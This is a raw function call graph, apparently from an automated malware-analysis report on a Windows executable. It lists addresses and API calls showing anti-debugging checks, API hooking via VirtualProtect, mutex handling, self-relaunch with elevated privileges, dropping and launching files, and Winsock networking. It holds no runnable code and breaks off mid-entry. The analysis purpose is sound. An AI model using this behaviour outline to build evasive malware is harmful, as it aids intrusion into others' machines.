6e5630 memcpy memcpy memcpy memcpy 14002->14003 14004 6e568b 14003->14004 14010 6e570a 14003->14010 14005 6e56c9 memcpy memcpy 14004->14005 14007 6e651b 3 API calls 14004->14007 14005->14010 14006 6e57b8 memcpy 14006->13992 14009 6e56b8 memcpy 14007->14009 14008 6e576c memcpy memcpy 14008->14006 14008->14010 14009->14005 14010->14006 14010->14008 14011 6e651b 3 API calls 14010->14011 14012 6e574f memcpy 14011->14012 14012->14010 14014 6e65d2 14013->14014 14015 6e4e80 14013->14015 14014->14015 14016 6e65ed memcmp 14014->14016 14015->13996 14021 6e4d09 _snprintf 14015->14021 14016->14015 14018 6e7353 14017->14018 14023 6e737e _alloca_probe 14018->14023 14022 6e4d42 14021->14022 14022->13996 14025 6e73a5 14023->14025 14027 6f0186 14025->14027 14026 6e7379 14026->13998 14028 6f0195 14027->14028 14029 6f01a4 14027->14029 14028->14026 14029->14028 14032 6f0d4a memset memset 14029->14032 14031 6f01ca 14031->14026 14033 6f0d8b CreateEventA 14032->14033 14034 6f0da1 WSASend 14032->14034 14033->14034 14035 6f0e0d GetLastError 14034->14035 14037 6f0dbe 14034->14037 14036 6f0e1a WSAGetLastError 14035->14036 14035->14037 14042 6f0dc4 14036->14042 14038 6f0e95 RegisterWaitForSingleObject 14037->14038 14037->14042 14039 6f0eb0 GetLastError 14038->14039 14038->14042 14040 6f0ebc GetLastError 14039->14040 14041 6f0ec0 GetLastError 14039->14041 14040->14042 14041->14042 14042->14031 14371 6e4151 ??3@YAXPAX 13064 402503 13065 402529 calloc 13064->13065 13066 402517 13064->13066 13068 402547 13065->13068 13067 40251c 13066->13067 13069 402585 strlen malloc 13066->13069 13070 402576 13066->13070 13068->13067 13072 4025ab 13069->13072 13073 4025ef 13069->13073 13071 408660 free 13070->13071 13071->13067 13075 4025c3 memcpy 13072->13075 13076 401c73 13073->13076 13075->13073 13077 401c81 13076->13077 13078 401c8f 13076->13078 13077->13078 13079 408660 free 13077->13079 13078->13070 13079->13078 13139 6e7329 ??3@YAXPAX 13140 6e733f 13139->13140 13093 6ef509 SetErrorMode 13112 6f1c63 6 API calls 13093->13112 13095 6ef519 WSAStartup 13113 6f160c memset htons inet_addr 13095->13113 13098 6f187b 13114 6f1653 memset htons 13098->13114 13101 6f18fc WSAGetLastError 13105 6f1908 13101->13105 13102 6f18c4 getsockopt 13103 6f18e9 13102->13103 13104 6f18f3 closesocket 13102->13104 13103->13104 13106 6f1909 socket 13104->13106 13105->13106 13107 6f194e WSAGetLastError 13106->13107 13108 6f191a getsockopt 13106->13108 13111 6f195a 13107->13111 13109 6f193f 13108->13109 13110 6f1945 closesocket 13108->13110 13109->13110 13110->13111 13112->13095 13113->13098 13117 6f27d0 13114->13117 13116 6f168c socket 13116->13101 13116->13102 13118 6f27da 13117->13118 13119 6f27f9 13117->13119 13120 6f27df 13118->13120 13124 6f28d5 memset 13118->13124 13133 6f2808 13119->13133 13120->13116 13123 6f27f7 13123->13116 13128 6f28fe 13124->13128 13125 6f2a19 13125->13123 13126 6f2925 strchr 13127 6f293b strchr 13126->13127 13126->13128 13127->13128 13128->13125 13128->13126 13129 6f2a26 13128->13129 13132 6f29c6 13128->13132 13129->13125 13130 6f2808 2 API calls 13129->13130 13130->13132 13131 6f2a4b memcpy 13131->13125 13132->13125 13132->13131 13135 6f28a7 13133->13135 13136 6f282d 13133->13136 13134 6f2832 strchr 13134->13136 13135->13123 13136->13134 13136->13135 13137 6f28a1 13136->13137 13137->13135 13138 6f28b4 memcpy 13137->13138 13138->13135 13438 6e6305 LoadLibraryA 13562 401330 atexit 14043 6e61d4 14044 6e61e3 14043->14044 14052 6e623b 14044->14052 14053 6e5e73 GetPEB 14044->14053 14046 6e61ed 14046->14052 14055 6e5f12 GetModuleHandleA GetProcAddress 14046->14055 14050 6e6226 SetErrorMode 14062 6e43c5 14050->14062 14054 6e5e92 14053->14054 14054->14046 14056 6e5f39 GetCurrentProcess NtQueryInformationProcess 14055->14056 14057 6e5f70 14055->14057 14058 6e5f52 14056->14058 14061 6e6320 memset memset memset 14057->14061 14058->14057 14059 6e5f60 14058->14059 14072 6e5fa1 GetModuleHandleA GetProcAddress 14059->14072 14061->14050 14064 6e43e9 14062->14064 14063 6e443e 14063->14052 14064->14063 14092 6e4444 14064->14092 14067 6e4427 14232 6e4211 14067->14232 14068 6e4430 14109 6e2b92 calloc 14068->14109 14073 6e603c 14072->14073 14074 6e5fc9 14072->14074 14073->14057 14074->14073 14076 6e6014 14074->14076 14078 6e0517 memset 14074->14078 14076->14073 14080 6e6085 GetProcAddress 14076->14080 14079 6e0543 14078->14079 14079->14074 14081 6e60fe 14080->14081 14082 6e609d 14080->14082 14081->14073 14082->14081 14087 6e6103 14082->14087 14085 6e60c6 VirtualProtect 14085->14081 14086 6e60e1 InterlockedExchange VirtualProtect 14085->14086 14086->14081 14089 6e6126 14087->14089 14090 6e60b8 14087->14090 14088 6e0517 memset 14088->14089 14089->14088 14089->14090 14091 6e6103 memset 14089->14091 14090->14081 14090->14085 14091->14089 14093 6eca28 memset 14092->14093 14094 6e447b 14093->14094 14095 6ee463 2 API calls 14094->14095 14096 6e448d 14095->14096 14097 6ee4fc 2 API calls 14096->14097 14098 6e449d _snwprintf OpenMutexW 14097->14098 14099 6e450f 14098->14099 14100 6e4509 CloseHandle 14098->14100 14102 6e4516 _snwprintf OpenMutexW 14099->14102 14104 6e457d GetCurrentProcessId ProcessIdToSessionId 14099->14104 14103 6e4416 14100->14103 14102->14099 14102->14100 14103->14063 14103->14067 14103->14068 14105 6e459c 14104->14105 14106 6e463d _snwprintf InitializeSecurityDescriptor SetSecurityDescriptorDacl CreateMutexW GetLastError 14104->14106 14105->14106 14107 6e45a6 _snwprintf InitializeSecurityDescriptor SetSecurityDescriptorDacl CreateMutexW GetLastError 14105->14107 14106->14100 14106->14103 14107->14100 14108 6e4633 14107->14108 14108->14103 14108->14106 14110 6e3598 14109->14110 14111 6e2bb9 14109->14111 14110->14063 14112 6e359d 4 API calls 14111->14112 14113 6e2bcd 14112->14113 14114 6e2cec memset time srand calloc 14113->14114 14117 6e403a 4 API calls 14113->14117 14115 6e2dfb ??3@YAXPAX 14114->14115 14116 6e2d41 14114->14116 14115->14110 14123 6e2e28 GetCurrentProcess OpenProcessToken 14115->14123 14119 6e2d47 strlen 14116->14119 14118 6e2be3 14117->14118 14118->14114 14122 6e2975 4 API calls 14118->14122 14121 6e8013 7 API calls 14119->14121 14124 6e2d60 14121->14124 14125 6e2bfe 14122->14125 14126 6e2e9d 14123->14126 14127 6e2e42 memset 14123->14127 14128 6e2de3 14124->14128 14131 6ef51e 5 API calls 14124->14131 14125->14114 14132 6e2c82 ??3@YAXPAX 14125->14132 14137 6e2c18 VirtualAlloc 14125->14137 14130 6e359d 4 API calls 14126->14130 14129 6e415d 7 API calls 14127->14129 14135 6e64d1 2 API calls 14128->14135 14133 6e2e70 14129->14133 14134 6e2ea2 14130->14134 14153 6e2d6c 14131->14153 14132->14114 14140 6e2c8f 14132->14140 14138 6e2e77 lstrcmpiW 14133->14138 14139 6e2e94 CloseHandle 14133->14139 14141 6e2eaa 14134->14141 14142 6e2f98 14134->14142 14136 6e2dee ??3@YAXPAX 14135->14136 14136->14115 14137->14132 14144 6e2c30 memcpy 14137->14144 14138->14139 14146 6e2e8d 14138->14146 14139->14126 14140->14114 14143 6e35f2 3 API calls 14141->14143 14145 6ec89b 9 API calls 14142->14145 14147 6e2eb5 14143->14147 14148 6e2c4e memcpy 14144->14148 14149 6e2c79 14144->14149 14150 6e2fa0 14145->14150 14146->14139 14151 6e358e ??3@YAXPAX 14147->14151 14152 6e2ec2 calloc 14147->14152 14148->14148 14148->14149 14149->14132 14154 6e403a 4 API calls 14150->14154 14151->14110 14152->14151 14155 6e2edb memcpy memcpy memcpy strlen 14152->14155 14157 6ef5ba 63 API calls 14153->14157 14159 6e2fab 14154->14159 14156 6e2f6c ??3@YAXPAX 14155->14156 14161 6e358d 14156->14161 14157->14128 14159->14151 14160 6e2975 4 API calls 14159->14160 14162 6e2fd1 14160->14162 14161->14151 14163 6e357a 14162->14163 14164 6e3f27 rand 14162->14164 14165 6e64d1 2 API calls 14163->14165 14166 6e2fe4 CreateFileMappingW 14164->14166 14167 6e3583 ??3@YAXPAX 14165->14167 14168 6e356a GetLastError 14166->14168 14169 6e3008 14166->14169 14167->14161 14170 6e3570 ??3@YAXPAX 14168->14170 14171 6e300f MapViewOfFile 14169->14171 14170->14163 14172 6e3559 GetLastError 14171->14172 14173 6e3029 strlen memcpy memcpy memcpy strcpy 14171->14173 14174 6e355f CloseHandle 14172->14174 14175 6e30a5 UnmapViewOfFile 14173->14175 14176 6e30a1 14173->14176 14174->14170 14177 6e30b6 14175->14177 14176->14175 14178 6e3122 lstrcpyW 14177->14178 14179 6e651b 3 API calls 14178->14179 14180 6e3152 14179->14180 14181 6e651b 3 API calls 14180->14181 14182 6e3165 14181->14182 14182->14174 14183 6e651b 3 API calls 14182->14183 14184 6e3186 14183->14184 14185 6e2975 4 API calls 14184->14185 14186 6e31b3 14185->14186 14186->14174 14187 6e651b 3 API calls 14186->14187 14188 6e31d0 14187->14188 14189 6e651b 3 API calls 14188->14189 14190 6e31e2 14189->14190 14191 6e3381 GetTickCount _snwprintf ExpandEnvironmentStringsW 14190->14191 14192 6e31f1 GetTickCount _snwprintf ExpandEnvironmentStringsW 14190->14192 14193 6e354d ??3@YAXPAX 14191->14193 14195 6e33b9 CreateFileW 14191->14195 14192->14193 14194 6e3229 CreateFileW 14192->14194 14193->14174 14194->14193 14197 6e3249 WriteFile CloseHandle 14194->14197 14195->14193 14196 6e33d9 WriteFile FindCloseChangeNotification 14195->14196 14196->14193 14198 6e3406 14196->14198 14197->14193 14199 6e3276 14197->14199 14198->14193 14200 6e340f _snwprintf 14198->14200 14199->14193 14201 6e327f _snwprintf 14199->14201 14203 6e343b 14200->14203 14202 6e32ab 14201->14202 14202->14193 14204 6e32b6 GetModuleHandleA 14202->14204 14203->14193 14205 6e3446 GetModuleHandleA 14203->14205 14206 6e32de 14204->14206 14207 6e32d1 GetProcAddress 14204->14207 14208 6e346e 14205->14208 14209 6e3461 GetProcAddress 14205->14209 14210 6e32e6 GetProcAddress 14206->14210 14211 6e32f3 ExpandEnvironmentStringsW 14206->14211 14207->14206 14212 6e3476 GetProcAddress 14208->14212 14213 6e3483 ExpandEnvironmentStringsW 14208->14213 14209->14208 14210->14211 14216 6e336c 14211->14216 14217 6e3319 GetStartupInfoW CreateProcessW 14211->14217 14212->14213 14218 6e34ae 14213->14218 14219 6e353f 14213->14219 14216->14193 14216->14219 14217->14216 14220 6e334e WaitForSingleObject CloseHandle CloseHandle 14217->14220 14221 6e34ee GetStartupInfoW CreateProcessW 14218->14221 14222 6e34b3 CoInitialize 14218->14222 14219->14193 14220->14216 14221->14219 14223 6e3521 WaitForSingleObject CloseHandle CloseHandle 14221->14223 14224 6e3f5f 10 API calls 14222->14224 14223->14219 14225 6e34bf 14224->14225 14226 6e34cf 14225->14226 14227 6e34c8 14225->14227 14229 6e6f32 14 API calls 14226->14229 14228 6e6977 20 API calls 14227->14228 14230 6e34cd 14228->14230 14229->14230 14230->14216 14231 6e34db Sleep 14230->14231 14231->14216 14250 6e94b6 14232->14250 14235 6e42be 14235->14063 14235->14068 14236 6e422c GetCurrentProcess 14253 6e42c5 OpenProcessToken 14236->14253 14239 6e4240 GetCommandLineW 14240 6e424c 14239->14240 14241 6e4251 lstrlenW 14239->14241 14242 6e425b calloc 14240->14242 14241->14242 14242->14235 14243 6e426c 14242->14243 14244 6e4278 lstrcatW GetModuleFileNameW 14243->14244 14245 6e4270 lstrcpyW 14243->14245 14246 6e429b 14244->14246 14247 6e42b6 ??3@YAXPAX 14244->14247 14245->14244 14249 6e42b3 14246->14249 14261 6e434f memset 14246->14261 14247->14235 14249->14247 14267 6e94c5 VerSetConditionMask VerSetConditionMask VerSetConditionMask VerifyVersionInfoW 14250->14267 14252 6e4224 14252->14235 14252->14236 14254 6e4238 14253->14254 14255 6e42e1 GetTokenInformation 14253->14255 14254->14235 14254->14239 14255->14254 14256 6e42f8 GetLastError 14255->14256 14256->14254 14257 6e4303 malloc 14256->14257 14257->14254 14258 6e4313 GetTokenInformation 14257->14258 14259 6e4326 GetSidSubAuthorityCount GetSidSubAuthority 14258->14259 14260 6e4340 ??3@YAXPAX 14258->14260 14259->14260 14260->14254 14262 6e436f ShellExecuteExW 14261->14262 14263 6e43bf 14261->14263 14264 6e43a5 CloseHandle 14262->14264 14265 6e43b0 14262->14265 14263->14246 14264->14263 14265->14263 14266 6e43b7 GetLastError 14265->14266 14266->14263 14267->14252 14268 4029fb 14269 402a11 GetModuleHandleW 14268->14269 14270 402afe 14268->14270 14269->14270 14272 402a70 14269->14272 14271 402ad8 GetProcessHeap HeapFree 14271->14270 14272->14271 14273 402aa2 strlen 14272->14273 14274 402b06 NtProtectVirtualMemory 14272->14274 14275 402ad4 14272->14275 14273->14272 14274->14270 14275->14271 13141 6e53a6 13142 6e53b9 13141->13142 13143 6e53c1 13142->13143 13145 6e53d2 13142->13145 13169 6e4c91 13143->13169 13154 6e53cc 13145->13154 13157 6e642a 13145->13157 13160 6e6362 13145->13160 13146 6e5446 13147 6e544e 13146->13147 13148 6e5456 13146->13148 13173 6e52e9 13147->13173 13150 6e545a 13148->13150 13151 6e5467 13148->13151 13178 6e478a 13150->13178 13191 6e4a39 13151->13191 13158 6e643f 13157->13158 13159 6e6434 ??3@YAXPAX 13157->13159 13158->13146 13159->13158 13161 6e63f9 malloc 13160->13161 13162 6e6373 13160->13162 13163 6e63ec 13161->13163 13162->13161 13164 6e6382 13162->13164 13163->13146 13164->13163 13165 6e63b6 13164->13165 13166 6e63a2 memmove 13164->13166 13165->13165 13167 6e63c0 malloc memcpy 13165->13167 13166->13163 13168 6e642a ??3@YAXPAX 13167->13168 13168->13163 13170 6e4ca3 13169->13170 13171 6e478a 20 API calls 13170->13171 13172 6e4cd9 13171->13172 13172->13154 13174 6e52f1 13173->13174 13175 6e52fb 13174->13175 13176 6e478a 20 API calls 13174->13176 13175->13154 13177 6e52f9 13176->13177 13177->13154 13179 6e47a9 13178->13179 13180 6e47a3 13178->13180 13181 6e47b9 13179->13181 13200 6e72d2 13179->13200 13195 6e4800 13180->13195 13184 6e47d3 13181->13184 13203 6e8173 13181->13203 13188 6e47e4 13184->13188 13206 6e649c 13184->13206 13187 6e47f4 ??3@YAXPAX 13187->13154 13188->13187 13189 6e649c ??3@YAXPAX 13188->13189 13190 6e47f3 13189->13190 13190->13187 13192 6e4a6c 13191->13192 13194 6e4a51 13191->13194 13192->13194 13390 6e7434 13192->13390 13194->13154 13196 6e480c 13195->13196 13197 6e4813 ??3@YAXPAX 13195->13197 13198 6e72d2 18 API calls 13196->13198 13197->13179 13199 6e4812 13198->13199 13199->13197 13210 6e72e0 13200->13210 13204 6f0066 7 API calls 13203->13204 13205 6e8182 13204->13205 13205->13184 13207 6e64a9 13206->13207 13209 6e64bc 13206->13209 13208 6e642a ??3@YAXPAX 13207->13208 13207->13209 13208->13209 13209->13188 13211 6e72ed 13210->13211 13212 6e649c ??3@YAXPAX 13211->13212 13213 6e72f6 13212->13213 13220 6e7311 13213->13220 13216 6e72dd 13216->13181 13217 6e642a ??3@YAXPAX 13217->13216 13256 6f0066 13220->13256 13222 6e7302 13222->13216 13222->13217 13223 6e3721 13222->13223 13251 6e64d1 13222->13251 13224 6e64d1 2 API calls 13223->13224 13230 6e373c 13224->13230 13225 6e393d 13227 6f0066 7 API calls 13225->13227 13229 6e3947 13225->13229 13226 6e3934 13228 6e649c ??3@YAXPAX 13226->13228 13227->13229 13228->13225 13229->13216 13230->13225 13230->13226 13288 6ef237 13230->13288 13232 6e381f 13232->13226 13294 6ef33a 13232->13294 13234 6e3841 13234->13226 13300 6eca28 13234->13300 13236 6e3869 13305 6ee463 13236->13305 13238 6e387b 13239 6ee463 2 API calls 13238->13239 13240 6e388d 13239->13240 13312 6ee4fc 13240->13312 13242 6e389d 13243 6eca28 memset 13242->13243 13244 6e38ce 13243->13244 13245 6ee463 2 API calls 13244->13245 13246 6e38dd 13245->13246 13247 6ee4fc 2 API calls 13246->13247 13248 6e38ed memcmp 13247->13248 13248->13226 13249 6e3903 calloc 13248->13249 13249->13226 13250 6e3919 memcpy 13249->13250 13250->13226 13252 6e64f1 13251->13252 13253 6e64e5 ??3@YAXPAX 13251->13253 13254 6e64f9 ??3@YAXPAX 13252->13254 13255 6e6507 13252->13255 13253->13252 13253->13253 13254->13254 13254->13255 13255->13216 13257 6f00a7 13256->13257 13258 6f0079 13256->13258 13257->13222 13258->13257 13259 6f00df 13258->13259 13260 6f0094 13258->13260 13265 6f141e 13259->13265 13260->13257 13262 6f009a abort 13260->13262 13263 6f00a0 13260->13263 13262->13263 13277 6f1f24 13263->13277 13266 6f1436 13265->13266 13270 6f145a 13265->13270 13267 6f143d shutdown 13266->13267 13268 6f1449 13266->13268 13271 6f144f 13267->13271 13281 6f155b 13268->13281 13270->13271 13272 6f155b 2 API calls 13270->13272 13273 6f150d closesocket 13271->13273 13274 6f151a 13271->13274 13275 6f146d 13272->13275 13273->13274 13274->13257 13275->13271 13276 6f1496 closesocket 13275->13276 13276->13275 13286 6f179c 13277->13286 13279 6f1f2f closesocket 13280 6f1f40 13279->13280 13280->13257 13282 6f1573 13281->13282 13283 6f157e WSAIoctl 13282->13283 13284 6f15a1 CancelIo 13282->13284 13283->13284 13285 6f159c 13283->13285 13284->13271 13285->13271 13287 6f17a6 13286->13287 13287->13279 13289 6ef249 13288->13289 13293 6ef24e 13289->13293 13318 6eea38 13289->13318 13291 6ef28a 13321 6ef2e6 13291->13321 13293->13232 13328 6eefcc 13294->13328 13296 6ef355 13297 6ef368 13296->13297 13336 6eec45 13296->13336 13297->13234 13299 6ef37c 13299->13234 13301 6eca35 13300->13301 13302 6eca31 13300->13302 13389 6ef390 memset 13301->13389 13302->13236 13304 6eca42 13304->13236 13306 6ee46d 13305->13306 13307 6ee471 13305->13307 13306->13238 13308 6ee496 memcpy 13307->13308 13311 6ee4ae 13307->13311 13308->13311 13309 6ee4f4 13309->13238 13310 6ee4e3 memcpy 13310->13309 13311->13309 13311->13310 13313 6ee55a 13312->13313 13314 6ee463 2 API calls 13313->13314 13315 6ee56b 13314->13315 13316 6ee463 2 API calls 13315->13316 13317 6ee577 13316->13317 13317->13242 13324 6eea65 13318->13324 13320 6eea4a 13320->13291 13322 6eea38 _allmul 13321->13322 13323 6ef30b 13322->13323 13323->13293 13327 6eea7f 13324->13327 13325 6eeb1d 13325->13320 13326 6eeab5 _allmul 13326->13327 13327->13325 13327->13326 13347 6ef0d6 13328->13347 13331 6ef0d6 memset 13334 6eeff2 13331->13334 13335 6ef060 13334->13335 13351 6eee7e 13334->13351 13360 6eeccc 13334->13360 13335->13296 13337 6eec59 13336->13337 13338 6eec5e 13337->13338 13339 6eec74 13337->13339 13377 6eebfe memset 13338->13377 13379 6eeb28 13339->13379 13341 6eec67 13378 6eebfe memset 13341->13378 13345 6eea38 _allmul 13346 6eec70 13345->13346 13346->13299 13348 6ef0e7 13347->13348 13375 6eebfe memset 13348->13375 13350 6eefe3 13350->13331 13352 6eea38 _allmul 13351->13352 13353 6eee97 13352->13353 13354 6eea38 _allmul 13353->13354 13355 6eeeff 13354->13355 13356 6eea38 _allmul 13355->13356 13357 6eef55 13356->13357 13358 6eea38 _allmul 13357->13358 13359 6eef7a 13358->13359 13359->13334 13361 6eea38 _allmul 13360->13361 13362 6eece8 13361->13362 13363 6eea38 _allmul 13362->13363 13364 6eecfb 13363->13364 13365 6eed96 13364->13365 13368 6eedb8 13364->13368 13366 6eedac 13365->13366 13367 6eeda4 13365->13367 13376 6eebfe memset 13366->13376 13369 6eee7e _allmul 13367->13369 13371 6eea38 _allmul 13368->13371 13374 6eedaa 13369->13374 13372 6eeddd 13371->13372 13373 6eea38 _allmul 13372->13373 13373->13374 13374->13334 13375->13350 13376->13374 13377->13341 13378->13346 13380 6eeb3a 13379->13380 13383 6eeb58 13380->13383 13382 6eeb53 13382->13345 13388 6eebfe memset 13383->13388 13385 6eea65 _allmul 13386 6eeb6d 13385->13386 13386->13385 13387 6eebeb 13386->13387 13387->13382 13388->13386 13389->13304 13393 6e7447 13390->13393 13396 6f010c 13393->13396 13395 6e7445 13395->13194 13397 6f0128 13396->13397 13398 6f0118 13396->13398 13397->13398 13401 6f08b6 13397->13401 13398->13395 13402 6f08e3 13401->13402 13403 6f014d 13402->13403 13404 6f0919 13402->13404 13405 6f090c CreateEventA 13402->13405 13403->13395 13407 6f0927 memset 13404->13407 13405->13404 13408 6f0954 memset 13407->13408 13410 6f0998 13408->13410 13411 6f09a0 WSARecv 13408->13411 13410->13411 13412 6f09e2 GetLastError 13411->13412 13413 6f09c2 13411->13413 13412->13413 13414 6f09ef WSAGetLastError 13412->13414 13417 6f0a3d RegisterWaitForSingleObject 13413->13417 13421 6f09cc 13413->13421 13415 6f09f9 WSAGetLastError 13414->13415 13416 6f0a01 WSAGetLastError 13414->13416 13415->13421 13416->13421 13418 6f0a55 GetLastError 13417->13418 13417->13421 13419 6f0a65 GetLastError 13418->13419 13420 6f0a61 GetLastError 13418->13420 13419->13421 13420->13421 13421->13403 12737 4011a0 12738 4011c9 SetUnhandledExceptionFilter 12737->12738 12739 4011ad 12737->12739 12740 4011dd 12738->12740 12739->12738 12753 4084b0 12740->12753 12744 4011ef 12745 401242 _setmode _setmode _setmode 12744->12745 12746 4011f8 __p__fmode 12744->12746 12745->12746 12774 4081a0 12746->12774 12748 40120a 12790 407d00 12748->12790 12750 401212 __p__environ 12794 402e0b 12750->12794 12754 4011ea 12753->12754 12756 4084c4 12753->12756 12757 4076f0 12754->12757 12755 408502 _fpreset 12755->12754 12756->12754 12756->12755 12758 407705 12757->12758 12759 407718 GetCommandLineA strlen 12757->12759 12760 40770a 12758->12760 12813 401290 __getmainargs 12758->12813 12762 40773c 12759->12762 12760->12744 12763 40785f __p__pgmptr 12762->12763 12766 407b3a 12762->12766 12767 4078d0 _isctype 12762->12767 12771 409630 67 API calls 12762->12771 12772 40781d 12762->12772 12763->12760 12764 40788a GetModuleFileNameA 12763->12764 12764->12760 12765 4078b9 __p__pgmptr _strdup 12764->12765 12765->12760 12769 407d96 12766->12769 12814 407fa0 12766->12814 12767->12762 12769->12744 12770 407e04 12770->12744 12771->12762 12772->12763 12799 409630 12772->12799 12775 4081a9 12774->12775 12777 4081b0 12774->12777 12775->12748 12776 408320 12778 40825f 12776->12778 12780 408331 12776->12780 12777->12775 12777->12776 12779 4081f6 12777->12779 12781 408370 12777->12781 12778->12748 12779->12781 12786 408202 12779->12786 12785 408368 12780->12785 13013 4080b0 VirtualQuery 12780->13013 12783 408060 9 API calls 12781->12783 12784 40838a 12783->12784 12785->12748 12786->12778 12788 40823c 12786->12788 12787 4080b0 9 API calls 12787->12788 12788->12778 12788->12786 12788->12787 12992 408060 fwrite vfprintf abort 12788->12992 12791 407d09 12790->12791 12792 407ca0 atexit 12790->12792 12791->12750 12792->12750 12795 407d00 atexit 12794->12795 12796 402e16 12795->12796 13033 402b64 HeapCreate 12796->13033 12798 401233 _cexit ExitProcess 12800 409646 12799->12800 12801 409663 12800->12801 12802 409656 12800->12802 12824 408d90 12801->12824 12879 408d40 malloc 12802->12879 12805 409672 12807 40969d strlen 12805->12807 12812 409679 12805->12812 12808 4096b9 12807->12808 12809 4096f7 _strdup 12808->12809 12810 409713 12809->12810 12809->12812 12881 408c90 12810->12881 12812->12763 12813->12760 12815 407fc0 12814->12815 12816 407fac 12814->12816 12817 408048 InitializeCriticalSection 12815->12817 12822 407fb1 12815->12822 12818 407fb5 12816->12818 12816->12822 12988 407e30 EnterCriticalSection 12816->12988 12817->12822 12818->12770 12819 407fe9 12819->12818 12821 407ff3 DeleteCriticalSection 12819->12821 12821->12818 12822->12770 12822->12818 12822->12819 12823 407e30 4 API calls 12822->12823 12823->12819 12825 408ee8 strlen 12824->12825 12826 408dab strlen 12824->12826 12849 408f03 12825->12849 12884 408390 12826->12884 12831 408d40 malloc 12832 408dfc 12831->12832 12833 409188 12832->12833 12834 408e0b 12832->12834 12835 408e1d strlen 12832->12835 12833->12805 12833->12849 12834->12835 12837 409416 12834->12837 12838 408e38 12835->12838 12836 40904e 12836->12805 12840 408d90 47 API calls 12837->12840 12841 408e6f _strdup 12838->12841 12839 408d90 47 API calls 12839->12849 12842 408e90 12840->12842 12841->12833 12843 408e88 12841->12843 12844 408e93 12842->12844 12845 408c90 5 API calls 12843->12845 12844->12833 12846 408e9e 12844->12846 12845->12842 12847 4091e0 strlen 12846->12847 12848 408ead 12846->12848 12876 408ed5 12847->12876 12848->12847 12850 408ecb 12848->12850 12849->12836 12849->12839 12855 409584 12850->12855 12850->12876 12851 409478 12852 408660 free 12851->12852 12853 409485 12852->12853 12853->12836 12854 4095a0 strlen 12858 4095b8 12854->12858 12855->12854 12861 40945b _strdup 12858->12861 12859 4092c9 strlen 12863 409233 12859->12863 12860 40926d _errno 12860->12876 12861->12851 12864 409469 12861->12864 12863->12851 12863->12859 12863->12876 12913 409f60 12863->12913 12918 409fb0 12863->12918 12927 409d60 12863->12927 12864->12851 12866 408c90 5 API calls 12864->12866 12866->12851 12869 409494 memcpy 12869->12876 12870 409355 memcpy strlen 12870->12876 12871 4093c7 _strdup 12873 409616 12871->12873 12871->12876 12872 4095e7 malloc 12872->12876 12874 409500 strcoll 12874->12876 12875 409524 _stricoll 12875->12876 12876->12851 12876->12860 12876->12863 12876->12869 12876->12870 12876->12871 12876->12872 12876->12874 12876->12875 12877 408c90 5 API calls 12876->12877 12878 40952b malloc 12876->12878 12924 408660 12876->12924 12941 4089c0 12876->12941 12948 408cf0 12876->12948 12877->12876 12878->12876 12880 408d63 12879->12880 12880->12801 12882 4085e0 5 API calls 12881->12882 12883 408cb6 12882->12883 12883->12812 12885 40839d memcpy 12884->12885 12886 409790 setlocale 12885->12886 12887 4097b3 _strdup 12886->12887 12888 4097bd setlocale 12886->12888 12887->12888 12889 4097e0 wcstombs 12888->12889 12890 4097d8 12888->12890 12958 4085e0 12889->12958 12890->12889 12891 409858 mbstowcs 12890->12891 12893 408390 12891->12893 12895 409887 mbstowcs 12893->12895 12894 409810 wcstombs setlocale 12896 408660 free 12894->12896 12897 4098d2 12895->12897 12898 4098b1 12895->12898 12903 408de8 12896->12903 12899 4098fe 12897->12899 12902 409910 12897->12902 12898->12897 12900 409ae5 setlocale 12898->12900 12899->12889 12901 408660 free 12900->12901 12901->12903 12904 409971 wcstombs 12902->12904 12912 409a00 12902->12912 12903->12831 12906 4085e0 5 API calls 12904->12906 12907 4099c4 wcstombs 12906->12907 12908 4099de setlocale 12907->12908 12909 408660 free 12908->12909 12909->12903 12910 409b2b wcstombs 12910->12908 12911 409b52 12910->12911 12911->12908 12912->12910 12912->12912 12914 409fa0 _errno 12913->12914 12915 409f6c 12913->12915 12916 409f8e 12914->12916 12915->12916 12974 409ca0 FindNextFileA 12915->12974 12916->12863 12919 409fe0 _errno 12918->12919 12920 409fbc FindClose 12918->12920 12922 409fd9 12919->12922 12920->12919 12921 409fd1 12920->12921 12923 408660 free 12921->12923 12922->12876 12923->12922 12978 40a110 12924->12978 12928 409f28 _errno 12927->12928 12929 409d79 12927->12929 12939 409e9d 12928->12939 12930 409d82 _fullpath 12929->12930 12931 409f08 _errno 12929->12931 12933 409da3 12930->12933 12931->12863 12932 409ef8 12932->12863 12933->12932 12934 409e47 malloc 12933->12934 12935 409f4f _errno 12934->12935 12937 409e68 12934->12937 12935->12939 12980 409bb0 FindFirstFileA 12937->12980 12939->12863 12940 408660 free 12940->12939 12947 4089de 12941->12947 12942 408a5a 12942->12876 12943 408690 6 API calls 12943->12947 12944 408a2a tolower tolower 12944->12947 12945 408a60 12945->12942 12946 4089c0 6 API calls 12945->12946 12946->12945 12947->12942 12947->12943 12947->12944 12947->12945 12949 408d04 12948->12949 12950 408cff 12948->12950 12952 408d0f 12949->12952 12954 408c90 5 API calls 12949->12954 12951 408cf0 6 API calls 12950->12951 12951->12949 12953 408d1d 12952->12953 12955 408cf0 6 API calls 12952->12955 12956 408660 free 12953->12956 12954->12952 12955->12953 12957 408d25 12956->12957 12957->12876 12959 4085f2 12958->12959 12960 40862c realloc 12958->12960 12959->12960 12961 408628 12959->12961 12962 40860a 12959->12962 12960->12894 12961->12960 12963 408640 12962->12963 12964 408610 _errno 12962->12964 12967 40a1d0 _msize 12963->12967 12964->12894 12966 408650 12966->12894 12968 40a1f8 12967->12968 12969 40a1fb realloc 12967->12969 12968->12969 12970 40a2a0 12969->12970 12972 40a21a 12969->12972 12970->12966 12971 40a26f 12971->12966 12972->12971 12973 40a25f memmove 12972->12973 12973->12971 12975 409d38 GetLastError 12974->12975 12977 409cc3 12974->12977 12976 409d42 _errno 12975->12976 12975->12977 12976->12916 12977->12916 12979 408677 free 12978->12979 12979->12876 12981 409c48 GetLastError _errno 12980->12981 12986 409bd4 12980->12986 12982 409c5b _errno 12981->12982 12983 409c7f _errno 12981->12983 12984 409c68 _errno 12982->12984 12985 409c8c _errno 12982->12985 12983->12986 12984->12986 12987 409c72 _errno 12984->12987 12985->12986 12986->12939 12986->12940 12987->12986 12989 407e7b LeaveCriticalSection 12988->12989 12991 407e4e 12988->12991 12989->12822 12990 407e50 TlsGetValue GetLastError 12990->12991 12991->12989 12991->12990 12993 4080b0 VirtualQuery 12992->12993 12994 4080e0 12993->12994 12995 408184 12993->12995 12996 4080ee 12994->12996 12998 408110 VirtualProtect 12994->12998 12997 408060 3 API calls 12995->12997 12996->12788 13003 40819c 12997->13003 12999 40813f 